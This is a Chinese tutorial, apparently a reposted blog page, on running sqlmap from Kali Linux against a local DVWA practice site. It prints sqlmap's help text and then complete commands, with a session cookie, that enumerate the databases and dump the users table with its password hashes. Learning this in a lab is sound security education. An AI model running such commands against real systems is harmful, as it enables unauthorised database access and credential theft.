在Kali Linux下使用sqlmap
来源:互联网 发布:袁腾飞知乎 编辑:程序博客网 时间:2024/06/05 19:38
Sqlmap是一款开源的命令行自动SQL注入工具。它能够对多种主流数据库进行扫描支持。
1.启动xampp
2.测试的网站是DVWA,security level设为medium,因为在sqlmap中安全等级设为low,medium,high都是一样的操作步骤。
3.启动Tamper Data(tools->tamper data)
4.测试一下
5.得到了request header
Host=127.0.0.1
User-Agent=Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
Accept=*/*
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=https://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit
Cookie=security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454
6.在终端用sqlmap
sqlmap的一些用法:
root@kali:~# sqlmap -hUsage: python sqlmap [options]Options: -h, --help Show basic help message and exit -hh Show advanced help message and exit --version Show program's version number and exit -v VERBOSE Verbosity level: 0-6 (default 1) Target: At least one of these options has to be provided to define the target(s) -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1") -g GOOGLEDORK Process Google dork results as target URLs Request: These options can be used to specify how to connect to the target URL --data=DATA Data string to be sent through POST --cookie=COOKIE HTTP Cookie header value --random-agent Use randomly selected HTTP User-Agent header value --proxy=PROXY Use a proxy to connect to the target URL --tor Use Tor anonymity network --check-tor Check to see if Tor is used properly Injection: These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts -p TESTPARAMETER Testable parameter(s) --dbms=DBMS Force back-end DBMS to this value Detection: These options can be used to customize the detection phase --level=LEVEL Level of tests to perform (1-5, default 1) --risk=RISK Risk of tests to perform (0-3, default 1) Techniques: These options can be used to tweak testing of specific SQL injection techniques --technique=TECH SQL injection techniques to use (default "BEUSTQ") Enumeration: These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements -a, --all Retrieve everything -b, --banner Retrieve DBMS banner --current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --passwords Enumerate DBMS users password hashes --tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries -D DB DBMS database to enumerate -T TBL DBMS database table(s) to enumerate -C COL DBMS database table column(s) to enumerate Operating system access: These options can be used to access the back-end database management system underlying operating system --os-shell Prompt for an interactive operating system shell --os-pwn Prompt for an OOB shell, Meterpreter or VNC General: These options can be used to set some general working parameters --batch Never ask for user input, use the default behaviour --flush-session Flush session files for current target Miscellaneous: --sqlmap-shell Prompt for an interactive sqlmap shell --wizard Simple wizard interface for beginner users[!] to see full list of options run with '-hh'root@kali:~#
sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454' --dbs
sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454' -D dvwa --tables
sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454' -D dvwa -T users --columns
sqlmap -u 'http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454' -D dvwa -T users --columns --dump
sqlmap的--dump选项,可以轻易的获得后台数据库的所有用户账户名和口令哈希。
- 在Kali Linux下使用sqlmap
- kali linux sqlmap
- kali下sqlmap注入无防火墙网址
- linux下sqlmap安装和使用
- Kali Linux渗透测试(苑房弘)Sqlmap
- 在虚拟机下安装kali linux
- Kali linux下ncat 使用详解
- kali 下使用nmap
- kali下beef使用
- Windows下Sqlmap的使用
- Kali Linux在Virtual Box下的安装
- 教你如何在Kali Linux 环境下设置蜜罐?
- 在Kali Linux下实战Nmap的秘诀
- 在Kali Linux下实战Nmap的秘诀
- 在Kali Linux下实战Nmap的秘诀
- 在Kali Linux下实战Nmap的秘诀
- 在Kali Linux下实战Nmap的秘诀
- 在kali linux下设置打开终端热键
- 抽象工厂模式
- 工程环境中设置预处理器定义
- PCAP 抓包
- PCAP 文件内容解析命令
- JSON详解
- 在Kali Linux下使用sqlmap
- POJ 1163 The Triangle
- LeetCode 104: Maximum Depth of Binary Tree
- php jquery的无刷新验证和提交
- [Spring Reference] P Ⅰ.Spring框架综述/1.Spring框架介绍/1.2 Spring框架模块
- 我面试遇到的C语言中单链表相关的操作粗浅实现
- 菜鸟学安卓Log.v(“第四篇”)——第一个安卓程序及DDMS视图和adb常用命令
- Android手机tcpdump抓包
- POJ1195 Mobile phones【树状数组】【二维】